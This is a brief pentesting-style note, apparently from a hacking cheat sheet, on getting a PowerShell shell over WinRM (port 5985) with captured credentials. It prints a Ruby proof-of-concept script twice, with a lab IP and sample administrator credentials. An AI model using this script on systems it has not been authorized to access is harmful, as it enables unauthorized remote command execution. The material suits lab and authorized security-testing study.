Windows Remote Management, or WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. Source: link
If you have obtained the credentials of winrm and you are able to access port 5985/wsman, you may use the below PoC to obtain a powershell shell.
The default HTTP port for winrm is 5985.
[email protected]:~# gem install winrm
[email protected]:~# cat winrm_shell.rb
require 'winrm'
conn = WinRM::Connection.new(
endpoint: 'http://192.168.78.185:5985/wsman',
user: 'administrator',
password: 'administrator123',
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
print "PS > "
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
[email protected]:~#
[email protected]:~#
[email protected]:~# cat winrm_shell.rb
require 'winrm'
conn = WinRM::Connection.new(
endpoint: 'http://192.168.78.185:5985/wsman',
user: 'administrator',
password: 'administrator123',
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
print "PS > "
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
[email protected]:~#
[email protected]:~#
Run the ruby script and obtain the shell. Make sure to install winrm before running the PoC above.